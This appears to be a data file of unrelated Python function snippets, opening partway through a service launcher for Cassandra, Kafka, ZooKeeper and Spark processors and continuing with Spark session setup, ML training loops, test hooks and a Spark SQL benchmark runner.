'Running':\n try:\n cmd_line = self.cmd_start_cassandra\n # print('starting cassandra------->')\n # print cmd_line\n\n #2311 Vpl update to fix problem of cassandra shutdown when term exit (10.x timeout)\n #cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n cmd = subprocess.call(['nohup',cmd_line])\n #(output,err) = cmd.communicate()\n\n # app_logger.info('*********output logging **************')\n # print(output)\n print ('cassandra has been started!')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('cassandra'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n else:\n print('cassandra Server is running!! please trying to stop it before it start.')\n return\n\n elif processor == 'kairosDb':\n if running_dict.has_key('kairosDb') and running_dict['kairosDb'] != 'Running' and running_dict['cassandra']=='Running':\n try:\n cmd_line = self.cmd_start_kairosDB\n # print('staring kairosDB------->')\n\n # print cmd_line\n\t\t\t\t\t#2311 Vpl update to fix problem of kairosDb shutdown when term exit (10.x timeout)\n\t\t\t\t\t#cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n cmd = subprocess.call(['nohup',cmd_line,'start'])\n #(output,err) = cmd.communicate()\n\n # app_logger.info('*********output logging **************')\n print('kairosDb has been started!')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('kairosDb'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n elif running_dict['cassandra']=='Stopped':\n print('cassandra required starting before kairosDb is running!! please trying to \"start cassandra\" first')\n return\n elif running_dict['kairosDB'] == 'Running':\n print('kairosDB Server is running!! please trying to stop it before it starts.')\n return\n\n elif processor == 'grafana':\n if running_dict.has_key('grafana') and running_dict['grafana'] != 'Running' and running_dict['kairosDb']=='Running':\n try:\n cmd_line = self.cmd_start_grafana\n # print('staring grafana------->')\n # print cmd_line\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n # (output,err) = cmd.communicate()\n # app_logger.info('*********output logging **************')\n # print(output)\n print ('grafana has been started!')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('grafana'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n elif running_dict['kairosDb']=='Stopped':\n print('kairosDb required starting before grafana is running!! please trying to \"start kairoseDb\" first')\n return\n elif running_dict['grafana'] == 'Running':\n print('grafana Server is running!! please trying to stop it before it starts.')\n return\n\n elif processor == 'kafka':\n if running_dict.has_key('kafka') and running_dict['kafka'] != 'Running' and running_dict['zookeeper']=='Running':\n try:\n cmd_line = self.cmd_start_kafka\n print('starting kafka------->')\n # print cmd_line\n\n #2311 Vpl update to fix problem of zookeeper shutdown when term exit (10.x timeout)\n #cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n cmd = subprocess.Popen(cmd_line)\n # (output,err) = cmd.communicate()\n # print (output)\n print ('kafka has been started!')\n return\n # app_logger.info('*********output logging **************')\n # print(output)\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('kafka'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n elif running_dict['zookeeper']=='Stopped':\n print('zookeeper required starting before kafka is running!! please trying to \"start zookeeper\" first')\n return\n elif running_dict['kafka'] == 'Running':\n print('Kafka Server is running!! please trying to stop it before it starts.')\n return\n\n elif processor == 'zookeeper':\n if running_dict.has_key('zookeeper') and running_dict['zookeeper'] != 'Running':\n try:\n cmd_line = self.cmd_start_zookeeper\n # print('staring zookeeper------->')\n # print (cmd_line)\n\n #2311 Vpl update to fix problem of zookeeper shutdown when term exit (10.x timeout)\n #cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n cmd = subprocess.Popen(cmd_line)\n # (output,err) = cmd.communicate()\n # print (output)\n\n print('zookeeper has been started!')\n return\n except Exception as ex:\n print(\" Failed to stop processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('zookeeper'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n else:\n print('Zookeeper Server is running!! please trying to stop it before it starts.')\n return\n\n elif processor == 'accl_processor':\n if running_dict:\n if running_dict['accl_processor'] != 'Running' and running_dict['spark<spark_worker>'] == 'Running' and running_dict['spark<spark_master>'] == 'Running' and running_dict['zookeeper'] == 'Running' and running_dict['kafka'] == 'Running':\n try:\n cmd_line = self.cmd_start_accl_processor\n print cmd_line\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n #cmd = subprocess.Popen(['nohup',cmd_line])\n # cmd = subprocess.Popen(cmd_line)\n\n print ('Accelerometer processor has been started')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if running_dict['accl_processor'] == 'Running':\n print('Accelerometer processor is running!! please trying to stop it before it starts.')\n return\n elif running_dict['spark<spark_worker>'] == 'Stopped' or running_dict['spark<spark_master>'] == 'Stopped':\n print('Please start spark first!! trying to use command \"start spark\"')\n return\n elif running_dict['zookeeper'] == 'Stopped':\n print('Please start zookeeper server first!! trying to use command \"start zookeeper\"')\n return\n elif running_dict['kafka'] == 'Stopped':\n print('Please start kafka server first!! trying to use command \"start kafka\"')\n return\n else:\n print('Please type correct command! You may use \"help start\" see more help')\n sys.exit(1)\n\n elif processor == 'baro_processor':\n if running_dict:\n if running_dict['baro_processor'] != 'Running' and running_dict['spark<spark_worker>'] == 'Running' and running_dict['spark<spark_master>'] == 'Running' and running_dict['zookeeper'] == 'Running' and running_dict['kafka'] == 'Running':\n try:\n cmd_line = self.cmd_start_baro_processor\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n print ('Barometer processor has been started')\n\t\t\tprint (cmd_line)\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if running_dict['baro_processor'] == 'Running':\n print('Barometer processor is running!! please trying to stop it before it starts.')\n return\n elif running_dict['spark<spark_worker>'] == 'Stopped' or running_dict['spark<spark_master>'] == 'Stopped':\n print('Please start spark first!! trying to use command \"start spark\"')\n return\n elif running_dict['zookeeper'] == 'Stopped':\n print('Please start zookeeper server first!! trying to use command \"start zookeeper\"')\n return\n elif running_dict['kafka'] == 'Stopped':\n print('Please start kafka server first!! trying to use command \"start kafka\"')\n return\n else:\n print('Please type correct command! You may use \"help start\" see more help')\n sys.exit(1)\n\n elif processor == 'gyro_processor':\n if running_dict:\n if running_dict['gyro_processor'] != 'Running' and running_dict['spark<spark_worker>'] == 'Running' and running_dict['spark<spark_master>'] == 'Running' and running_dict['zookeeper'] == 'Running' and running_dict['kafka'] == 'Running':\n try:\n cmd_line = self.cmd_start_gyro_processor\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n print ('Gyroscope processor has been started')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if running_dict['gyro_processor'] == 'Running':\n print('Gyroscope processor is running!! please trying to stop it before it starts.')\n return\n elif running_dict['spark<spark_worker>'] == 'Stopped' or running_dict['spark<spark_master>'] == 'Stopped':\n print('Please start spark first!! trying to use command \"start spark\"')\n return\n elif running_dict['zookeeper'] == 'Stopped':\n print('Please start zookeeper server first!! trying to use command \"start zookeeper\"')\n return\n elif running_dict['kafka'] == 'Stopped':\n print('Please start kafka server first!! trying to use command \"start kafka\"')\n return\n else:\n print('Please type correct command! You may use \"help start\" see more help')\n sys.exit(1)\n\n elif processor == 'aggr_processor':\n if running_dict:\n if running_dict['aggr_processor'] != 'Running' and running_dict['spark<spark_worker>'] == 'Running' and running_dict['spark<spark_master>'] == 'Running' and running_dict['zookeeper'] == 'Running' and running_dict['kafka'] == 'Running':\n try:\n cmd_line = self.cmd_start_aggr_naiv\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n print ('Aggregator processor has been started')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if running_dict['aggr_processor'] == 'Running':\n print('Aggregator processor is running!! please trying to stop it before it starts.')\n return\n elif running_dict['spark<spark_worker>'] == 'Stopped' or running_dict['spark<spark_master>'] == 'Stopped':\n print('Please start spark first!! trying to use command \"start spark\"')\n return\n elif running_dict['zookeeper'] == 'Stopped':\n print('Please start zookeeper server first!! trying to use command \"start zookeeper\"')\n return\n elif running_dict['kafka'] == 'Stopped':\n print('Please start kafka server first!! trying to use command \"start kafka\"')\n return\n else:\n print ('Please type correct command! You may use \"help start\" see more help')\n sys.exit(1)\n\n else:\n print ('Please type correct command! You may use \"help start\" see more help')", "def pytest_configure() -> None: # pragma: no cover\n print(\"Starting server app\")\n PROC.start()\n time.sleep(1)\n if PROC.exitcode is not None:\n pytest.exit(\"Failed to start the server, exit code {}\\nLogs are in logs/server.log\".format(PROC.exitcode))\n return\n\n create_generated_client()", "def test_training():\n assert init_engine('train', [\"config=first_run_test/default.yaml\"]).run() is None", "def add_spark(self,node):\n import os\n import json\n from urllib.request import urlopen\n import ssl\n if \"SPARK_ENV_LOADED\" not in os.environ:\n return # no Spark\n\n spark = ET.SubElement(node, 'spark')\n try:\n import requests\n import urllib3\n urllib3.disable_warnings()\n except ImportError:\n ET.SubElement(spark,'error').text = \"SPARK_ENV_LOADED present but requests module not available\"\n return \n\n host = 'localhost'\n p1 = 4040\n p2 = 4050\n import urllib.error\n for port in range(p1,p2+1):\n try:\n url = 'http://{}:{}/api/v1/applications/'.format(host,port)\n resp = urlopen(url, context=ssl._create_unverified_context())\n spark_data = resp.read()\n break\n except (ConnectionError, ConnectionRefusedError, urllib.error.URLError) as e:\n continue\n if port>=p2:\n ET.SubElement(spark,'error').text = f\"SPARK_ENV_LOADED present but no listener on {host} ports {p1}-{p2}\"\n return\n\n # Looks like we have Spark!\n for app in json.loads(spark_data):\n app_id = app['id']\n app_name = app['name']\n e = ET.SubElement(spark,'application',{'id':app_id,'name':app_name})\n\n attempt_count = 1\n for attempt in app['attempts']:\n e = ET.SubElement(spark,'attempt')\n json_to_xml(e,attempt)\n for param in ['jobs','allexecutors','storage/rdd']:\n url = f'http://{host}:{port}/api/v1/applications/{app_id}/{param}'\n resp = urlopen(url, context=ssl._create_unverified_context())\n data = resp.read()\n e = ET.SubElement(spark,param.replace(\"/\",\"_\"))\n json_to_xml(e,json.loads(data))", "def setup():\n # Parse the command line arguments\n args = parse_arguments()\n\n # Load training configurations\n config = load_yaml(args.config)\n update_not_none(config, vars(args))\n\n # Setup experiment directories and update them to configurations\n setup_dirs(config)\n\n # Setup loggers\n del logging.getLogger('tensorflow').handlers[0]\n setup_loggers(config['log_dir'])\n\n # Setup GPUs\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = config['gpu']\n\n # Backup source code\n backup_src(config['src_dir'])\n\n return config", "def create_spark_session(KEY, SECRET):\n spark = SparkSession \\\n .builder \\\n .appName(\"S3 Data Lake\") \\\n .config(\"spark.executor.heartbeatInterval\", \"3600s\")\\\n .config(\"spark.network.timeout\", \"36000s\")\\\n .config(\"spark.driver.memory\", \"16g\")\\\n .config(\"spark.driver.maxResultSize\", \"16g\")\\\n .config(\"spark.executor.memory\", \"16g\")\\\n .config(\"spark.python.worker.memory\", \"2g\")\\\n .getOrCreate()\n \n # Some other configs\n hadoop_conf = spark.sparkContext._jsc.hadoopConfiguration()\n hadoop_conf.set(\"fs.s3n.impl\", \"org.apache.hadoop.fs.s3native.NativeS3FileSystem\")\n hadoop_conf.set(\"fs.s3n.awsAccessKeyId\", KEY)\n hadoop_conf.set(\"fs.s3n.awsSecretAccessKey\", SECRET)\n\n #spark.sparkContext.setSystemProperty(\"com.amazonaws.services.s3.enableV4\", \"true\")\n return spark", "def main(): \n spark = create_spark_session()\n print(\"Spark Session Created\")\n\n #Print S3 bucket location\n s3_bucket=os.environ[\"s3_bucket\"]\n s3_bucket = s3_bucket.replace(\"'\", \"\")\n \n print (s3_bucket)\n \n #Invoke Functions to process data\n process_data(spark, s3_bucket)", "def open_spark_session(config: Config):\n if not config.session_exists(\"SparkSession\"):\n config.debug(\"SparkSession\", \"Opening Spark session\")\n session = SparkSess(config).spark\n config.add_session(\"SparkSession\", session)\n config.debug(\"SparkSession\", f\"Spark session added to sessions opened\")\n else:\n config.debug(\"SparkSession\", f\"Spark session already exists\")", "def __init__(\n self,\n conf: ExpConfig,\n estep_conf: EStepConfig,\n model: Trainable,\n train_data_file: str,\n val_data_file: str = None,\n ):\n if tvo.get_run_policy() == \"mpi\":\n init_processes()\n train_dataset = get_h5_dataset_to_processes(train_data_file, (\"train_data\", \"data\"))\n val_dataset = None\n if val_data_file is not None:\n val_dataset = get_h5_dataset_to_processes(val_data_file, (\"val_data\", \"data\"))\n\n setattr(conf, \"train_dataset\", train_data_file)\n setattr(conf, \"val_dataset\", val_data_file)\n super().__init__(conf, estep_conf, model, train_dataset, val_dataset)", "def train_parallel(config):\n _setup_parallel_env()\n print(f\" | Starting training on {os.getenv('RANK_SIZE', None)} devices.\")\n\n pre_train_dataset = load_dataset(\n data_files=config.pre_train_dataset,\n batch_size=config.batch_size,\n sink_mode=config.dataset_sink_mode,\n rank_size=MultiDevice.get_group_size(),\n rank_id=MultiDevice.get_rank()\n ) if config.pre_train_dataset else None\n fine_tune_dataset = load_dataset(\n data_files=config.fine_tune_dataset,\n batch_size=config.batch_size,\n sink_mode=config.dataset_sink_mode,\n rank_size=MultiDevice.get_group_size(),\n rank_id=MultiDevice.get_rank()\n ) if config.fine_tune_dataset else None\n test_dataset = load_dataset(\n data_files=config.test_dataset,\n batch_size=config.batch_size,\n sink_mode=config.dataset_sink_mode,\n rank_size=MultiDevice.get_group_size(),\n rank_id=MultiDevice.get_rank()\n ) if config.test_dataset else None\n\n _build_training_pipeline(config=config,\n pre_training_dataset=pre_train_dataset,\n fine_tune_dataset=fine_tune_dataset,\n test_dataset=test_dataset)", "def train(self, config, **kwargs):\n\n config_parameters = utils.parse_config_or_kwargs(config, **kwargs)\n outputdir = Path(\n config_parameters['outputpath'], config_parameters['model'],\n \"{}_{}\".format(\n datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%m'),\n uuid.uuid1().hex[:8]))\n # Early init because of creating dir\n checkpoint_handler = ModelCheckpoint(\n outputdir,\n 'run',\n n_saved=1,\n require_empty=False,\n create_dir=True,\n score_function=lambda engine: -engine.state.metrics['Loss'],\n save_as_state_dict=False,\n score_name='loss')\n logger = utils.getfile_outlogger(Path(outputdir, 'train.log'))\n logger.info(\"Storing files in {}\".format(outputdir))\n # utils.pprint_dict\n utils.pprint_dict(config_parameters, logger.info)\n logger.info(\"Running on device {}\".format(DEVICE))\n labels_df = pd.read_csv(config_parameters['trainlabel'], sep=' ')\n labels_df['encoded'], encoder = utils.encode_labels(\n labels=labels_df['bintype'])\n train_df, cv_df = utils.split_train_cv(labels_df)\n\n transform = utils.parse_transforms(config_parameters['transforms'])\n utils.pprint_dict({'Classes': encoder.classes_},\n logger.info,\n formatter='pretty')\n utils.pprint_dict(transform, logger.info, formatter='pretty')\n if 'sampler' in config_parameters and config_parameters[\n 'sampler'] == 'MinimumOccupancySampler':\n # Asserts that each \"batch\" contains at least one instance\n train_sampler = dataset.MinimumOccupancySampler(\n np.stack(train_df['encoded'].values))\n\n sampling_kwargs = {\"sampler\": train_sampler, \"shuffle\": False}\n elif 'shuffle' in config_parameters and config_parameters['shuffle']:\n sampling_kwargs = {\"shuffle\": True}\n else:\n sampling_kwargs = {\"shuffle\": False}\n\n logger.info(\"Using Sampler {}\".format(sampling_kwargs))\n\n colname = config_parameters.get('colname', ('filename', 'encoded')) #\n trainloader = dataset.getdataloader(\n train_df,\n config_parameters['traindata'],\n transform=transform,\n batch_size=config_parameters['batch_size'],\n colname=colname, # For other datasets with different key names\n num_workers=config_parameters['num_workers'],\n **sampling_kwargs)\n cvdataloader = dataset.getdataloader(\n cv_df,\n config_parameters['traindata'],\n transform=None,\n shuffle=False,\n colname=colname, # For other datasets with different key names\n batch_size=config_parameters['batch_size'],\n num_workers=config_parameters['num_workers'])\n if 'pretrained' in config_parameters and config_parameters[\n 'pretrained'] is not None:\n model = models.load_pretrained(config_parameters['pretrained'],\n outputdim=len(encoder.classes_))\n else:\n model = getattr(models, config_parameters['model'],\n 'LightCNN')(inputdim=trainloader.dataset.datadim,\n outputdim=len(encoder.classes_),\n **config_parameters['model_args'])\n\n if config_parameters['optimizer'] == 'AdaBound':\n try:\n import adabound\n optimizer = adabound.AdaBound(\n model.parameters(), **config_parameters['optimizer_args'])\n except ImportError:\n logger.info(\n \"Adabound package not found, install via pip install adabound. Using Adam instead\"\n )\n config_parameters['optimizer'] = 'Adam'\n config_parameters['optimizer_args'] = {\n } # Default adam is adabount not found\n else:\n optimizer = getattr(\n torch.optim,\n config_parameters['optimizer'],\n )(model.parameters(), **config_parameters['optimizer_args'])\n\n utils.pprint_dict(optimizer, logger.info, formatter='pretty')\n utils.pprint_dict(model, logger.info, formatter='pretty')\n if DEVICE.type != 'cpu' and torch.cuda.device_count() > 1:\n logger.info(\"Using {} GPUs!\".format(torch.cuda.device_count()))\n model = torch.nn.DataParallel(model)\n criterion = torch.nn.CrossEntropyLoss().to(DEVICE)\n model = model.to(DEVICE)\n\n precision = Precision()\n recall = Recall()\n f1_score = (precision * recall * 2 / (precision + recall)).mean()\n metrics = {\n 'Loss': Loss(criterion),\n 'Precision': precision.mean(),\n 'Recall': recall.mean(),\n 'Accuracy': Accuracy(),\n 'F1': f1_score,\n }\n\n # batch contains 3 elements, X,Y and filename. Filename is only used\n # during evaluation\n def _prep_batch(batch, device=DEVICE, non_blocking=False):\n x, y, _ = batch\n return (convert_tensor(x, device=device,\n non_blocking=non_blocking),\n convert_tensor(y, device=device,\n non_blocking=non_blocking))\n\n train_engine = create_supervised_trainer(model,\n optimizer=optimizer,\n loss_fn=criterion,\n prepare_batch=_prep_batch,\n device=DEVICE)\n inference_engine = create_supervised_evaluator(\n model, metrics=metrics, prepare_batch=_prep_batch, device=DEVICE)\n\n RunningAverage(output_transform=lambda x: x).attach(\n train_engine, 'run_loss') # Showing progressbar during training\n pbar = ProgressBar(persist=False)\n pbar.attach(train_engine, ['run_loss'])\n scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer,\n patience=3,\n factor=0.1)\n\n @inference_engine.on(Events.COMPLETED)\n def update_reduce_on_plateau(engine):\n val_loss = engine.state.metrics['Loss']\n if 'ReduceLROnPlateau' == scheduler.__class__.__name__:\n scheduler.step(val_loss)\n else:\n scheduler.step()\n\n early_stop_handler = EarlyStopping(\n patience=5,\n score_function=lambda engine: -engine.state.metrics['Loss'],\n trainer=train_engine)\n inference_engine.add_event_handler(Events.EPOCH_COMPLETED,\n early_stop_handler)\n inference_engine.add_event_handler(Events.EPOCH_COMPLETED,\n checkpoint_handler, {\n 'model': model,\n 'encoder': encoder,\n 'config': config_parameters,\n })\n\n @train_engine.on(Events.EPOCH_COMPLETED)\n def compute_validation_metrics(engine):\n inference_engine.run(cvdataloader)\n results = inference_engine.state.metrics\n output_str_list = [\n \"Validation Results - Epoch : {:<5}\".format(engine.state.epoch)\n ]\n for metric in metrics:\n output_str_list.append(\"{} {:<5.3f}\".format(\n metric, results[metric]))\n logger.info(\" \".join(output_str_list))\n pbar.n = pbar.last_print_n = 0\n\n train_engine.run(trainloader, max_epochs=config_parameters['epochs'])\n return outputdir", "def run(context, path=\"\"):\n common.success(f\"Tests {path} running \")\n return start.run_python(\n context,\n f\"-m pytest {path}\"\n )", "def execute(self, context):\n\n self._hook = SparkSubmitHook(\n conf=self._conf,\n conn_id=self._conn_id,\n ssh_conn_id=self._ssh_conn_id,\n files=self._files,\n py_files=self._py_files,\n driver_classpath=self._driver_classpath,\n jars=self._jars,\n java_class=self._java_class,\n packages=self._packages,\n exclude_packages=self._exclude_packages,\n repositories=self._repositories,\n total_executor_cores=self._total_executor_cores,\n executor_cores=self._executor_cores,\n executor_memory=self._executor_memory,\n driver_memory=self._driver_memory,\n keytab=self._keytab,\n principal=self._principal,\n name=self._name,\n num_executors=self._num_executors,\n application_args=self._application_args,\n env_vars=self._env_vars,\n verbose=self._verbose,\n dataeng_spark=self.dataeng_spark,\n dataeng_spark_pyenv_path=self.dataeng_spark_pyenv_path\n\n )\n self._hook.submit(self._application)", "def train_single(config):\n print(\" | Starting training on single device.\")\n\n pre_train_dataset = load_dataset(data_files=config.pre_train_dataset,\n batch_size=config.batch_size,\n sink_mode=config.dataset_sink_mode) if config.pre_train_dataset else None\n fine_tune_dataset = load_dataset(data_files=config.fine_tune_dataset,\n batch_size=config.batch_size,\n sink_mode=config.dataset_sink_mode) if config.fine_tune_dataset else None\n test_dataset = load_dataset(data_files=config.test_dataset,\n batch_size=config.batch_size,\n sink_mode=config.dataset_sink_mode) if config.test_dataset else None\n\n _build_training_pipeline(config=config,\n pre_training_dataset=pre_train_dataset,\n fine_tune_dataset=fine_tune_dataset,\n test_dataset=test_dataset)", "def run(config):\n\tlog.debug('-- in example.py')\n#\tgetWLSMachineandandExecuteSecondary(config)\n#\t__createPegaConfigCommand(config)\n#\tcreateUsers(config)\n#\t__connectAdminServer(config)\n\tconnectAdminServerOverSSL(config)", "def startTestRun(self):", "def get_dataflow_spark_session(app_name=\"DataFlow\", file_location=None, profile_name=None, spark_config={}):\n if in_dataflow():\n spark_builder = SparkSession.builder.appName(app_name)\n else:\n # Import OCI.\n try:\n import oci\n except:\n raise Exception(\n \"You need to install the OCI python library to test locally\"\n )\n\n # Use defaults for anything unset.\n if file_location is None:\n file_location = oci.config.DEFAULT_LOCATION\n if profile_name is None:\n profile_name = oci.config.DEFAULT_PROFILE\n\n # Load the config file.\n try:\n oci_config = oci.config.from_file(\n file_location=file_location, profile_name=profile_name\n )\n except Exception as e:\n print(\"You need to set up your OCI config properly to run locally\")\n raise e\n conf = SparkConf()\n conf.set(\"fs.oci.client.auth.tenantId\", oci_config[\"tenancy\"])\n conf.set(\"fs.oci.client.auth.userId\", oci_config[\"user\"])\n conf.set(\"fs.oci.client.auth.fingerprint\", oci_config[\"fingerprint\"])\n conf.set(\"fs.oci.client.auth.pemfilepath\", oci_config[\"key_file\"])\n conf.set(\n \"fs.oci.client.hostname\",\n \"https://objectstorage.{0}.oraclecloud.com\".format(\n oci_config[\"region\"]),\n )\n spark_builder = SparkSession.builder.appName(\n app_name).config(conf=conf)\n\n # Add in extra configuration.\n for key, val in spark_config.items():\n spark_builder.config(key, val)\n\n # Create the Spark session.\n session = spark_builder.enableHiveSupport().getOrCreate()\n return session", "def create_spark_session():\n try:\n spark = (\n SparkSession.builder\n # .config(\"spark.hadoop.fs.s3a.awsAccessKeyId\", os.environ['AWS_ACCESS_KEY_ID'])\n # .config(\"spark.hadoop.fs.s3a.awsSecretAccessKey\", os.environ['AWS_SECRET_ACCESS_KEY'])\n .enableHiveSupport()\n .getOrCreate()\n )\n # spark._jsc.hadoopConfiguration().set(\"fs.s3a.awsAccessKeyId\", os.environ['AWS_ACCESS_KEY_ID'])\n # spark._jsc.hadoopConfiguration().set(\"fs.s3a.awsSecretAccessKey\", os.environ['AWS_SECRET_ACCESS_KEY'])\n # spark._jsc.hadoopConfiguration().set(\"fs.s3a.impl\",\"org.apache.hadoop.fs.s3a.S3AFileSystem\")\n # spark._jsc.hadoopConfiguration().set(\"com.amazonaws.services.s3.enableV4\", \"true\")\n # spark._jsc.hadoopConfiguration().set(\"fs.s3a.aws.credentials.provider\",\"org.apache.hadoop.fs.s3a.BasicAWSCredentialsProvider\")\n # spark._jsc.hadoopConfiguration().set(\"fs.s3a.endpoint\", \"s3.amazonaws.com\")\n except Exception as e:\n logger.error('Pyspark session failed to be created...')\n raise\n return spark", "def main():\n # create a Spark session\n spark = create_spark_session()\n\n # set input & output data locations\n input_data = \"data/\"\n output_data = \"results/\"\n\n # Gather/read the datasets\n df_visits = spark.read.parquet(\"data/immigration_data\")\n df_demo = spark.read.csv(\"data/us-cities-demographics.csv\", sep=\";\", header=True)\n df_airports = spark.read.csv(\"data/airport-codes_csv.csv\", header=True)\n df_airport_codes = get_airport_codes(spark)\n df_countries = get_countries(spark)\n df_states = get_states(spark)\n df_visa = get_visa(spark)\n\n # clean the datasets\n df_airports_clean = clean_airport_codes(spark,df_airports)\n df_demo_clean= clean_demographics(spark,df_demo)\n df_visits_clean = clean_immigration_data(spark, df_visits, df_airport_codes, df_countries, df_states, df_visa)\n\n # load the fact and dimensions in parquet files\n load_dimensions(output_data, df_countries, df_states, df_visa, df_demo_clean, df_airports_clean)\n load_fact(spark,output_data, df_visits_clean)\n\n # run validation checks\n validate_dimensions(spark,['dim_visa','dim_state','dim_country','dim_us_demo','dim_airports'],output_data)\n validate_fact(spark,'fact_visits',output_data)", "def train_main(cls):\n launcher = cls()\n launcher.launch()", "def Run(benchmark_spec):\n cluster = benchmark_spec.dpb_service\n storage_service = cluster.storage_service\n metadata = benchmark_spec.dpb_service.GetMetadata()\n\n metadata['benchmark'] = BENCHMARK_NAMES[FLAGS.dpb_sparksql_query]\n\n # Run PySpark Spark SQL Runner\n report_dir = '/'.join([cluster.base_dir, f'report-{int(time.time()*1000)}'])\n args = [\n '--sql-scripts',\n ','.join(benchmark_spec.staged_queries),\n '--report-dir',\n report_dir,\n ]\n if FLAGS.dpb_sparksql_database:\n args += ['--database', FLAGS.dpb_sparksql_database]\n table_metadata = _GetTableMetadata(benchmark_spec)\n if table_metadata:\n table_metadata_file = '/'.join([cluster.base_dir, 'metadata.json'])\n _StageMetadata(table_metadata, storage_service, table_metadata_file)\n args += ['--table-metadata', table_metadata_file]\n else:\n # If we don't pass in tables, we must be reading from hive.\n # Note you can even read from Hive without --create_hive_tables if they\n # were precreated.\n args += ['--enable-hive', 'True']\n if FLAGS.dpb_sparksql_table_cache:\n args += ['--table-cache', FLAGS.dpb_sparksql_table_cache]\n if FLAGS.dpb_sparksql_simultaneous:\n args += ['--simultaneous', 'True']\n jars = []\n if FLAGS.spark_bigquery_connector:\n jars.append(FLAGS.spark_bigquery_connector)\n job_result = cluster.SubmitJob(\n pyspark_file='/'.join([cluster.base_dir, SPARK_SQL_RUNNER_SCRIPT]),\n job_arguments=args,\n job_jars=jars,\n job_type=dpb_service.BaseDpbService.PYSPARK_JOB_TYPE)\n\n # Spark can only write data to directories not files. So do a recursive copy\n # of that directory and then search it for the single JSON file with the\n # results.\n temp_run_dir = temp_dir.GetRunDirPath()\n storage_service.Copy(report_dir, temp_run_dir, recursive=True)\n report_file = None\n for dir_name, _, files in os.walk(\n os.path.join(temp_run_dir, os.path.basename(report_dir))):\n for filename in files:\n if filename.endswith('.json'):\n report_file = os.path.join(dir_name, filename)\n logging.info(report_file)\n if not report_file:\n raise errors.Benchmarks.RunError('Job report not found.')\n\n results = []\n run_times = {}\n passing_queries = set()\n with open(report_file, 'r') as file:\n for line in file:\n result = json.loads(line)\n logging.info('Timing: %s', result)\n query_id = _GetQueryId(result['script'])\n assert query_id\n passing_queries.add(query_id)\n metadata_copy = metadata.copy()\n metadata_copy['query'] = query_id\n results.append(\n sample.Sample('sparksql_run_time', result['duration'], 'seconds',\n metadata_copy))\n run_times[query_id] = result['duration']\n\n metadata['failing_queries'] = ','.join(\n sorted(set(FLAGS.dpb_sparksql_order) - passing_queries))\n\n results.append(\n sample.Sample('sparksql_total_wall_time', job_result.wall_time, 'seconds',\n metadata))\n results.append(\n sample.Sample('sparksql_geomean_run_time',\n sample.GeoMean(run_times.values()), 'seconds', metadata))\n cluster_create_time = cluster.GetClusterCreateTime()\n if cluster_create_time is not None:\n results.append(\n sample.Sample('dpb_cluster_create_time', cluster_create_time, 'seconds',\n metadata))\n return results", "def run_starter(self, expect_to_fail=False):", "def test_documentation_popxl_mnist_rts_train_test(self):\n filename = \"mnist_rts.py --replication-factor 2 --rts --test\"\n self.run_python(filename, file_dir=working_dir, working_dir=working_dir)", "def start(self):\n\n self.loadConf()\n self.loadDrivers()\n self.loadFeeds()\n self.runScheduler()\n self.scheduler.print_jobs()\n self.scheduler.start()\n self.printConf(\"test\")\n print(\"scheduler started\")", "def main():\n print('Retrieving iris data from servers...', end='')\n iris_data = sklearn.datasets.load_iris()\n print('done')\n sys.stdout.flush()\n\n X = iris_data['data']\n Y = [iris_data['target_names'][label] for label in iris_data['target']]\n\n examples = [{'id': 'EXAMPLE_{}'.format(i),\n 'y': y,\n 'x': {f'f{j}': x_val for j, x_val in enumerate(x)}}\n for i, (x, y) in enumerate(zip(X, Y))]\n\n examples_train, examples_test = train_test_split(examples, test_size=0.33,\n random_state=42)\n\n print('Writing training and testing files...', end='')\n for examples, suffix in [(examples_train, 'train'), (examples_test,\n 'test')]:\n iris_dir = os.path.join('iris', suffix)\n if not os.path.exists(iris_dir):\n os.makedirs(iris_dir)\n jsonlines_path = os.path.join(iris_dir,\n 'example_iris_features.jsonlines')\n with open(jsonlines_path, 'w') as f:\n for ex in examples:\n f.write(f'{json.dumps(ex)}\\n')\n print('done')", "def experiment(**config):\n from ..training.train import training\n \n training(config)", "def setup(self, skip_start=False):\n nprev_comm = self.comm_count\n nprev_thread = self.thread_count\n nprev_fd = self.fd_count\n self.driver = self.driver_class(*self.driver_args, **self.driver_kwargs)\n if not skip_start:\n self.driver.start()\n os.environ.update(self.driver.env)\n self._skip_start = skip_start\n super(TestBase, self).setup(nprev_comm=nprev_comm,\n nprev_thread=nprev_thread,\n nprev_fd=nprev_fd)", "def to_spark(self):\n from intake_spark.base import SparkHolder\n args = [\n ['read'],\n ['parquet', 